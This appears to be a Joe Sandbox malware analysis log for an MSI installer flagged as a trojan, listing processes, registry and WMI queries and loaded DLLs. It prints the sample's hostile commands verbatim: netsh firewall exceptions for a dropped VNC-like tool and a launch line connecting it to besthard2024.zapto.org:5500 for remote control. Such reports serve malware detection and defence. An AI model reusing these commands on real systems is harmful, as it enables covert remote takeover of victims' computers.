                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B9F094_2_005B9F09
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_0058FF004_2_0058FF00
                  Source: Joe Sandbox ViewDropped File: C:\Games\PrintDriver.exe 29379AFD1CA5439C82931D623FDA335174DC416E5B013591457FA1F7BBE564DB
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: String function: 0044A03C appears 103 times
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: String function: 0044A06F appears 67 times
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: String function: 0044A400 appears 40 times
                  Source: C:\Games\PrintDrivers.exeCode function: String function: 005A5126 appears 56 times
                  Source: C:\Games\PrintDrivers.exeCode function: String function: 005A50F2 appears 94 times
                  Source: C:\Games\PrintDrivers.exeCode function: String function: 005A5630 appears 40 times
                  Source: PrintDriver.exe.1.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                  Source: PrintDriver.exe.1.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                  Source: rs8dpaIe6D.msiBinary or memory string: OriginalFilenameviewer.exeF vs rs8dpaIe6D.msi
                  Source: rs8dpaIe6D.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs rs8dpaIe6D.msi
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: classification engineClassification label: mal100.troj.evad.winMSI@78/47@1/2
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004262B0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,3_2_004262B0
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00426FE0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,3_2_00426FE0
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00421D80 LoadResource,LockResource,SizeofResource,3_2_00421D80
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML416B.tmpJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                  Source: C:\Games\PrintDriver.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFAE3E9B168B65793C.TMPJump to behavior
                  Source: C:\Games\PrintDrivers.exeCommand line argument: A\4_2_005C4140
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="PrintDriver.exe")
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="PrintDriver.exe")
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
                  Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
                  Source: C:\Games\PrintDrivers.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: rs8dpaIe6D.msiVirustotal: Detection: 14%
                  Source: rs8dpaIe6D.msiReversingLabs: Detection: 26%
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\rs8dpaIe6D.msi"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4384.tmp "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
                  Source: unknownProcess created: C:\Games\PrintDrivers.exe "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
                  Source: C:\Games\PrintDrivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\PrintDriver.exe C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\PrintDrivers.exe C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                  Source: C:\Games\PrintDrivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4384.tmp "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"Jump to behavior
                  Source: C:\Games\PrintDrivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20 Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>NulJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\PrintDrivers.exe C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20 Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALLJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALLJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\PrintDriver.exe C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -runJump to behavior
                  Source: C:\Games\PrintDrivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: msi.dllJump to behavior
